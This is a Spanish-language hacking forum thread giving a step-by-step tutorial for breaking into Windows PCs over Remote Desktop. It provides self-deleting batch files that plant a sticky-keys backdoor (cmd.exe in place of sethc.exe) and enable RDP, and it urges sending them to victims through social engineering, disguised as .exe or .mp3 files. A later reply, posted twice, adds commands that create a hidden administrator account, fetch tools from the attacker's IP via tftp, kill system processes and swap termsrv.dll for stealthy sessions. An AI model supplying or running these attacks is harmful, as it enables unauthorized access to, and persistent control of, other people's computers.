Hackear por Escritorio Remoto de Windows
1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):
2)Crear un batch que haga los siguiente:
Código:
echo off
title .
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
del %0
exit
Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.
2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.
Código:
echo off
title .
cls
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit
Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.
3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"
4)Luego click en conectar.
5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.
6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).
7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
Código:
copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
del "c:\windows\system32\setch.zzz"
Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)
EXPLICACION DEL MANUAL.
Cuando enciendes un ordenador, normalmente pide un user y un pass, se podría cambiando los valores de CMD por StickyKeys, cuando estas para meter la pass, pulsas 5 veces shift, y se abriría CMD, ya desde ahí podrías ejecutar servicios, etc...
Con ingenieria social intentariamos colar los .bat
Por ejemplo, quieres entrar al de tu amigo (uno que se confie), le pasas los bats, te haces con su ip, lo intentas jeje
por hay anda un programa para convertir bat a .exe. otro para covertir.exe a .mp3 jejeje xd bueno hasta luego y comenten porfavor
oye tu si sabes bastante de hacking y hablando de como hackear pero hasta bacano hay q aprender bien
xD, hombre estaria bien con el truco de .mp3.jpb creo que era xD, si se lo consiges pasar pues way xD, de todos modos para pasarle un .bat creo que le pasamos el .exe directamente ( creo ) xD , igualmente gracias porque no conocia el metodo xD , Thx
no yo lo convierto a .exe con un programa http://www.pcultimate.net/topico-2996-convertir-un-archivo-bat-a-exe.html y luego a .mp3 con otro este
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
Última edición por 1 el hacker el 17 Jun 2009, 20:20, editado 1 vez en total.
1 el hacker arregla el link para cambiar de .bat a .exe gracias
YA LO ARREGLE
1 el hacker escribió:no yo lo convierto a .exe con un programa [Enlace externo eliminado para invitados] ... a-exe.html y luego a .mp3 con otro este
.mp3.dxy más bien.
Igualmente, lo dicho, gracias
http://img844.imageshack.us/img844/8088/mujerrara.jpg
http://img715.imageshack.us/img715/5813/tigree.png
http://img830.imageshack.us/img830/6484/camaleon.png
http://img839.imageshack.us/img839/4944/tigrev2.jpg
http://img843.imageshack.us/img843/443/spidermanxn.png
http://www.youtube.com/watch?v=wHYYkciIKE0
Interesenate metodo, se agradece la informacion...
Saludos
Saludos
-Aprovechemos mientras Windows es vulnerable.
-No hagas a otros lo que no te gustaría que hagan con.... tu mamá.
-El mejor Snifer es tu propio ISP.
-No hagas a otros lo que no te gustaría que hagan con.... tu mamá.
-El mejor Snifer es tu propio ISP.
Ha pero que barbaro muy bueno tu aporte lo voy a probar...solo si tuviera amigos..
Bueno aca encontre las utilidades( de bat a exe. de com a exe, de hombre a mujer) por si no les anda el link arriba aqui estan: [Enlace externo eliminado para invitados]
Bueno aca encontre las utilidades( de bat a exe. de com a exe, de hombre a mujer) por si no les anda el link arriba aqui estan: [Enlace externo eliminado para invitados]
"Que no nos diferencie el conocimiento, sino, la inteligencia al actuar" V.C. Ahijuna!
Voy a mejorar el tutorial...
Ya que le mandas un .bat, puedes añadirle lo siguiente:
net users [usuario nuevo] [password] /add
net localgroup Administradores [usuario que acabas de crear] /add
net localgroup "Usuarios de escritorio remoto" [usuario que acabas de crear] /add
Esto añade un nuevo usuario conectable por el escritorio remoto. Recuerda que si estás hackeando un windows xp en inglés, tienes que cambiar el nombre de los grupos. Lo malo es que crea un usuario en la lista. Para solventarlo, añade al bat:
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v [usuario] /t REG_DWORD /d 0
Si quieres, puedes cambiarle la contraseña a la cuenta "Administrador", que solo sale en el modo a prueba de fallos y luego añadirlo al grupo de usuarios de escritorio remoto (esto último no lo he probado).
Peeeeeeero, el escritorio remoto tiene un problema, y es que solo permite un usuario, tanto local como remoto. Lo que significa que desconectarías al que está sentado enfrente del PC. Para instalar una versión antigua, que sí permite varios usuarios, bajate este DLL: termsrv.dll (pesa 210 kilobytes). Lo encontraras junto a varios manuales sobre como permitir varios usuarios, pero todos te dicen que tienes que reiniciar el PC en modo a prueba de fallos, lo cual no es posible hacerlo remotamente (ni sería sigiloso xD). Leéroslos de todas maneras.
Para solventar esto, sube la herramienta pskill (la encontraras en este pack [Enlace externo eliminado para invitados] ... 96649.aspx) al equipo remoto por tftp (o lo que se te ocurra):
tftp [tu ip] GET pskill c:\windows
Es un terminador de procesos, lo usamos en vez del clásico taskkill por que este nos impediria cargarnos los procesos svchost que están usando el termsrv.dll. Nos lo cargaríamos así:
pskill svchost.exe
Sería mas limpio cargarse sólo el que usa el termsrv.dll, pero es que no se me ocurren maneras de determinarlo por la línea de comandos... Gráficamente yo abriría el programa Process Explorer (también lo encontraréis en microsoft) y lo vería ahí. Una vez tecleada la línea anterior, escribimos:
shutdown -a
Esto para evitar el apagado del PC, porque nos hemos cargado procesos críticos... Ya podemos sustituir termsrv.dll y ejecutar escritorio remoto otra vez.
del c:\windows\system32\termsrv.dll
tftp [tu IP] GET termsrv.dll c:\windows\system32
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core” /v EnableConcurrentSessions /t REG_DWORD /d 1
net start "Servicios de Terminal Server"
Y eso es todo amigos xD. Recordad que el PC estará un poco inestable hasta que se reinicie por que nos hemos cargado los svchost. Espero que os guste mi aportación.
Ya que le mandas un .bat, puedes añadirle lo siguiente:
net users [usuario nuevo] [password] /add
net localgroup Administradores [usuario que acabas de crear] /add
net localgroup "Usuarios de escritorio remoto" [usuario que acabas de crear] /add
Esto añade un nuevo usuario conectable por el escritorio remoto. Recuerda que si estás hackeando un windows xp en inglés, tienes que cambiar el nombre de los grupos. Lo malo es que crea un usuario en la lista. Para solventarlo, añade al bat:
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v [usuario] /t REG_DWORD /d 0
Si quieres, puedes cambiarle la contraseña a la cuenta "Administrador", que solo sale en el modo a prueba de fallos y luego añadirlo al grupo de usuarios de escritorio remoto (esto último no lo he probado).
Peeeeeeero, el escritorio remoto tiene un problema, y es que solo permite un usuario, tanto local como remoto. Lo que significa que desconectarías al que está sentado enfrente del PC. Para instalar una versión antigua, que sí permite varios usuarios, bajate este DLL: termsrv.dll (pesa 210 kilobytes). Lo encontraras junto a varios manuales sobre como permitir varios usuarios, pero todos te dicen que tienes que reiniciar el PC en modo a prueba de fallos, lo cual no es posible hacerlo remotamente (ni sería sigiloso xD). Leéroslos de todas maneras.
Para solventar esto, sube la herramienta pskill (la encontraras en este pack [Enlace externo eliminado para invitados] ... 96649.aspx) al equipo remoto por tftp (o lo que se te ocurra):
tftp [tu ip] GET pskill c:\windows
Es un terminador de procesos, lo usamos en vez del clásico taskkill por que este nos impediria cargarnos los procesos svchost que están usando el termsrv.dll. Nos lo cargaríamos así:
pskill svchost.exe
Sería mas limpio cargarse sólo el que usa el termsrv.dll, pero es que no se me ocurren maneras de determinarlo por la línea de comandos... Gráficamente yo abriría el programa Process Explorer (también lo encontraréis en microsoft) y lo vería ahí. Una vez tecleada la línea anterior, escribimos:
shutdown -a
Esto para evitar el apagado del PC, porque nos hemos cargado procesos críticos... Ya podemos sustituir termsrv.dll y ejecutar escritorio remoto otra vez.
del c:\windows\system32\termsrv.dll
tftp [tu IP] GET termsrv.dll c:\windows\system32
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core” /v EnableConcurrentSessions /t REG_DWORD /d 1
net start "Servicios de Terminal Server"
Y eso es todo amigos xD. Recordad que el PC estará un poco inestable hasta que se reinicie por que nos hemos cargado los svchost. Espero que os guste mi aportación.
muy util reaper
1 El hacker. Hice una prueba con un colega de utilizarlo en cobayas, porque cuando hago clic en conectarse aparece este error, 1 el hacker?
este bebe funciona y es muy util porque al ser un .batch sele puede agregar mas cosa es cuestion de ideas
saludos
saludos
creo que debes poner los creditos
[Enlace externo eliminado para invitados] ... 495.0.html
por cierto muy buen tutorial.
Saludos
[Enlace externo eliminado para invitados] ... 495.0.html
por cierto muy buen tutorial.
Saludos
